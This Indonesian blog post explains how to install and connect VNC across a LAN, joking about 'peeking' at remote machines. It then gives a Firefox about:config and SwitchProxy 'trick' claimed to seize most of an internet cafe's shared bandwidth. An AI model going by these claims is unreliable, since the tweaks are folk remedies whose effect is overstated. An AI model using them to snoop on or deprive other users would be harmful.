http://www.brothersoft.com/vnc-(virtual-network-computing)-download-10766.html
Sebelum menggunakan VNC sebaiknya jaringan sudah terinstall dengan baik. Agar koneksi bisa dilakukan. Untuk test koneksi jaringan LAN silakan anda lakukan ping kekomputer tujuan. saya harap anda sudah tau cara ping.. karena anda bukan saatnya untuk disulangi lagi..
Ikuti langkah berikut:
Pilih directory install trus Next
pilih VNC SERVER atau Viewer kalau Viewer artinya Anda dapat melakukan remote kejaringan kalau server artinya ada siap melayani koneksi untuk di remote terserah pilih yang mana, kalau masing binggung pilh aja dua-duanya dan rasakan kasiatnya,, he..he..
ikuti petunjuk gambar
beri sandi untuk komputer anda bila orang lain akan meremote komputer tentu dia harus tau sandi yang anda
isi sandi
Sampai disini anda sudah berhasil melakukan install, lakukan hal yang sama kesetiap komputer yang ingin diremote.
Kalau langka-langka sudah dijalankan untuk meremote komputer silakan jalankan VNC viewer dan masukan ip address tujuan
Nah sekarang kendali ditangan anda anda tinggal mengintip. kekekek
Menguasi Bandwith diwarnet
Biasanya Bandwidth setiap komputer yang ada di warnet sengaja
dibatasi agar setiap komputer dapat dioperasikan dengan baik tanpa
kekurangan bandwidth, berikut adalah trik untuk
mengatasi masalah tersebut:
1). Buka
Browser Mozilla Firefox…
2). Pada Address Bar Ketik :
ABOUT:CONFIG
3). Cari string di
bawah ini : (pastikan semua string dibawah “TRUE”) Ganti string menjadi :
+
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
+
NETWORK.HTTP.PIPELINING TRUE
+ NETWORK.HTTP.PIPELINING.MAXREQUESTS
64
+ NETWORK.HTTP.PROXY.PIPELINING TRUE
+
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
Dimana Saja, Klik Kanan NEW>>INTEGER
5). Ketik :
NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH
atau Tekan F5
7). Pada Address Bar Ketik : ABOUT:BLANK
8).
Klik Menu: ini untuk firefox versi lama, untuk firefox ver.2 atau 3 ga
perlu
Untuk OS Windows
XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux (Vector)
EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS
EDIT >>ADVANCED
9).
Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check
Box Untuk mengaktifkan
10).Kemudian
Tekan OK Lalu REFRESH (F5)
11).Masuk Ke Link Ini
:https://addons.mozilla.org/en-US/firefox/addon/125?applicationfiltered=firefox&id=125
12).Download Software SwitchProxy Tool Versi 1.3.4
13).Setelah
Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada
Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
16).Kemudian
Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang
sudah di Install Tadi
17).Kalo
Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi
& Address Bar.
18). Sekarang Browser Mozilla Siap Untuk
Digunakan…….
:: CATATAN :: — Software SwitchProxy Tool Versi 1.3.4
Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla
FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
– Cara Ini Sangat Efektif Bila
Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth
(Mayoritas kecepatan akses Internet) Pada Komputer Yang Sedang Anda
Pakai.
– Perubahan Yang Signifikan Terjadi Pada koneksi Internet
Dengan “BROADBAND / VSAT”
Langganan:
Postingan (Atom)
